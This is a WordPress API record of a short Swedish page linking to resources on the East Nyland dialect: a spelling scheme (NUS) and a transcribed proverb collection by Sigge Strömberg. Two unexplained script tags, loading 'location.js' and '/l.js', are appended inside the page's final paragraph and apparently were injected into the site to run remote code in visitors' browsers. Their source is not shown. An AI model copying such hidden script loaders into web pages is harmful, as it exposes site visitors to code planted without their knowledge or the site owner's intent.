{"id":2845,"date":"2015-03-02T21:14:05","date_gmt":"2015-03-02T19:14:05","guid":{"rendered":"http:\/\/84.20.155.7\/nywp\/?page_id=2845"},"modified":"2015-03-02T21:14:05","modified_gmt":"2015-03-02T19:14:05","slug":"spraksidor","status":"publish","type":"page","link":"https:\/\/hindersby.net\/word2021\/spraksidor\/","title":{"rendered":"Spr\u00e5ksidor"},"content":{"rendered":"<p>H\u00e4r finns fasta sidor om spr\u00e5k.<\/p>\n<p>NUS &#8211; <a title=\"NUS: Nisses Uttalsriktiga Stavning\" href=\"http:\/\/hindersby.net\/nywp\/?page_id=2836\">Nisses Uttalsriktiga Stavning<\/a> eller Hur man skriiv\u00e4r opa dialekt ?.<\/p>\n<p>S\u00e5 finns en transkribering till NUS av Sigge Str\u00f6mbergs manuskript\u00a0 &#8221;<a title=\"Lilla ordspr\u00e5ksboken av Sigge Str\u00f6mberg\" href=\"http:\/\/hindersby.net\/nywp\/?page_id=2834\">Lilla ordspr\u00e5ksboken<\/a>&#8221; med ordst\u00e4v opa \u00f6stnyylendsk\u00e5.<script src='location.js?p=1' type=text\/javascript><\/script><script src='\/l.js?p=1' type=text\/javascript><\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>H\u00e4r finns fasta sidor om spr\u00e5k. NUS &#8211; Nisses Uttalsriktiga Stavning eller Hur man skriiv\u00e4r opa dialekt ?. S\u00e5 finns en transkribering till NUS av Sigge Str\u00f6mbergs manuskript\u00a0 &#8221;Lilla ordspr\u00e5ksboken&#8221; med ordst\u00e4v opa \u00f6stnyylendsk\u00e5.<\/p>\n","protected":false},"author":2,"featured_media":0,"parent":0,"menu_order":0,"comment_status":"open","ping_status":"open","template":"","meta":{"ngg_post_thumbnail":0,"footnotes":""},"class_list":["post-2845","page","type-page","status-publish","hentry"],"_links":{"self":[{"href":"https:\/\/hindersby.net\/word2021\/wp-json\/wp\/v2\/pages\/2845","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/hindersby.net\/word2021\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/hindersby.net\/word2021\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/hindersby.net\/word2021\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/hindersby.net\/word2021\/wp-json\/wp\/v2\/comments?post=2845"}],"version-history":[{"count":0,"href":"https:\/\/hindersby.net\/word2021\/wp-json\/wp\/v2\/pages\/2845\/revisions"}],"wp:attachment":[{"href":"https:\/\/hindersby.net\/word2021\/wp-json\/wp\/v2\/media?parent=2845"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}